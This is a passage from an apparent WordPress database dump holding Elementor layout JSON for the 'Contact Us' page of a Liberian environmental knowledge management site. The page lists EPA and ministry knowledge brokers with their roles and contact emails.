information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14952,2374,'_elementor_edit_mode','builder'),(14953,2374,'_elementor_template_type','wp-page'),(14954,2374,'_elementor_version','2.7.5'),(14955,2374,'_wp_page_template','default'),(14956,2374,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"